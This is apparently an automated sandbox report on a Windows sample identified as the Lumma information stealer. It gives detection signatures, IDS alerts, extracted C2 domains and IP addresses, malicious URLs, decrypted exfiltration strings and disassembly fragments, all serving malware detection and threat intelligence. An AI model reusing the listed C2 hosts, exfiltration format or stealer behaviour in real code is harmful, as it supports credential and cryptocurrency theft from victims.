Edit tour

Windows Analysis Report
DG55Gu1yGM.exe

Overview

General Information

Sample name:	DG55Gu1yGM.exe renamed because original name is a hash value
Original sample name:	f5f01c71d9ad196656cdceef7c1f12e6.exe
Analysis ID:	1576510
MD5:	f5f01c71d9ad196656cdceef7c1f12e6
SHA1:	962510bfb783205e77952ba732d64ef893270c54
SHA256:	2dda3c98fdc0a1a6cfeb495975c4ef006342388e1e9bcbbd2f11d323ac443090
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Sample uses string decryption to hide its real strings

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

DG55Gu1yGM.exe (PID: 4724 cmdline: "C:\Users\user\Desktop\DG55Gu1yGM.exe" MD5: F5F01C71D9AD196656CDCEEF7C1F12E6)

8BB0.tmp.exe (PID: 5064 cmdline: "C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe" MD5: 2C0A5976C7D6D86506EB825C8D67A8B8)

WerFault.exe (PID: 3064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1636 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["immureprech.biz", "sordid-snaked.cyou", "debonairnukk.xyz", "deafeninggeh.biz", "awake-weaves.cyou", "effecterectz.xyz", "diffuculttan.xyz", "wrathful-jammy.cyou"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2550594932.00000000008D8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1268:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000002.00000002.2550901616.00000000024B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000003.2195992842.0000000002500000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.8BB0.tmp.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.3.8BB0.tmp.exe.2500000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.3.8BB0.tmp.exe.2500000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.8BB0.tmp.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:49.777440+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.131.68.180	443	TCP
2024-12-17T08:18:52.338976+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	45.77.249.79	443	TCP
2024-12-17T08:18:56.178703+0100	2028371	3	Unknown Traffic	192.168.2.5	49715	104.121.10.34	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:50.284154+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49706	104.131.68.180	443	TCP
2024-12-17T08:18:53.290018+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49708	45.77.249.79	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:50.284154+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49706	104.131.68.180	443	TCP
2024-12-17T08:18:53.290018+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49708	45.77.249.79	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:52.338976+0100	2058215	1	Domain Observed Used for C2 Detected	192.168.2.5	49708	45.77.249.79	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:49.777440+0100	2058223	1	Domain Observed Used for C2 Detected	192.168.2.5	49706	104.131.68.180	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:54.274547+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.5	55725	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:50.289403+0100	2058214	1	Domain Observed Used for C2 Detected	192.168.2.5	49702	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:53.742917+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.5	51454	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:53.516770+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.5	60957	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:53.291662+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.5	51781	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:48.315792+0100	2058222	1	Domain Observed Used for C2 Detected	192.168.2.5	63478	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:48.082321+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.5	61916	1.1.1.1	53	UDP
2024-12-17T08:18:54.498503+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.5	65226	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:54.053892+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.5	62073	1.1.1.1	53	UDP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:42.268418+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	104.21.56.70	443	TCP
2024-12-17T08:18:43.839039+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49705	176.113.115.19	80	TCP

ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:49.781276+0100	2822521	1	Domain Observed Used for C2 Detected	104.131.68.180	443	192.168.2.5	49706	TCP
2024-12-17T08:18:52.350433+0100	2822521	1	Domain Observed Used for C2 Detected	45.77.249.79	443	192.168.2.5	49708	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T08:18:56.932913+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49715	104.121.10.34	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DG55Gu1yGM.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://debonairnukk.xyz/apix	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/api0	Avira URL Cloud: Label: malware
Source: https://sordid-snaked.cyou/	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEk	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/apiR	Avira URL Cloud: Label: malware
Source: https://wrathful-jammy.cyou/H	Avira URL Cloud: Label: malware
Source: https://sordid-snaked.cyou/api9	Avira URL Cloud: Label: malware
Source: https://diffuculttan.xyz/api5	Avira URL Cloud: Label: malware

Found malware configuration

Source: 2.2.8BB0.tmp.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["immureprech.biz", "sordid-snaked.cyou", "debonairnukk.xyz", "deafeninggeh.biz", "awake-weaves.cyou", "effecterectz.xyz", "diffuculttan.xyz", "wrathful-jammy.cyou"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for submitted file

Source: DG55Gu1yGM.exe	Virustotal: Detection: 43%			Perma Link
Source: DG55Gu1yGM.exe	ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: DG55Gu1yGM.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: sordid-snaked.cyou
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: awake-weaves.cyou
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: wrathful-jammy.cyou
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: debonairnukk.xyz
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: diffuculttan.xyz
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: effecterectz.xyz
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: deafeninggeh.biz
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: immureprech.biz
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: sordid-snaked.cyou
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.2550346622.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: 4h5VfH--

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Unpacked PE file: 0.2.DG55Gu1yGM.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Unpacked PE file: 2.2.8BB0.tmp.exe.400000.0.unpack

Source: DG55Gu1yGM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.5:49715 version: TLS 1.2

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004389F2 FindFirstFileExW,		0_2_004389F2
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02158C59 FindFirstFileExW,		0_2_02158C59

Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h	2_2_0043CD60
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp al, 2Eh	2_2_00426054
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then jmp eax	2_2_00426054
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	2_2_0043B05D
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	2_2_0043B05D
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	2_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	2_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]	2_2_0040E83B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h	2_2_0043B05B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	2_2_0043B05B
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov edx, ecx	2_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	2_2_0040C917
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then jmp ecx	2_2_0043C1F0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	2_2_00425990
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ecx, di	2_2_00425990
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]	2_2_0043B195
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi]	2_2_0043B9A1
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh	2_2_004369A0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	2_2_0041E9B0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_004299B0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then lea eax, dword ptr [esp+18h]	2_2_0042526A
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ebx, edi	2_2_0041D270
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov esi, eax	2_2_00423A34
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h	2_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, word ptr [eax]	2_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then jmp ecx	2_2_0043C280
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+eax]	2_2_00415298
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_00415298
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_0043AAB2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], 0000h	2_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	2_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov eax, ebx	2_2_0041CB05
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h	2_2_0043CB20
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov edx, eax	2_2_00427326
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_004143C2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov edi, dword ptr [esp+34h]	2_2_004143C2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	2_2_0042A3D0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_0042C45C
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ebp, dword ptr [eax]	2_2_00436C00
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	2_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [esi+64h]	2_2_00418578
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov edx, eax	2_2_0042750D
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_00421D10
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+ecx]	2_2_0040DD25
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, edx	2_2_0040BDC9
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]	2_2_00417582
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]	2_2_00427DA2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h	2_2_004205B0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0042C64A
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_0042AE48
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then jmp eax	2_2_00426E50
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]	2_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_0042AE24
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00433630
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0042C6E4
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	2_2_00425E90
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h	2_2_0043CE90
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_004166A0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0041BEA0
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov ecx, eax	2_2_0042ADF4
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov eax, edx	2_2_0041C6BB
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then jmp eax	2_2_0043BF40
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]	2_2_00415F66
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch	2_2_00419770
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh	2_2_00419770
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh	2_2_00419770
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h	2_2_00419770
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	2_2_00419770
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h	2_2_00419770
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	2_2_00419770
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	2_2_00419770
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov edx, dword ptr [ebp-10h]	2_2_0043A777
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]	2_2_00409700
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h]	2_2_00409700
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]	2_2_00409700
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0042C726
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_0042C735
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_0040CFF3
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]	2_2_0040CFF3
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	2_2_0041DF80
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	2_2_0040D7A2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]	2_2_0040D7A2
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	2_2_024BD25A
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]	2_2_024BD25A
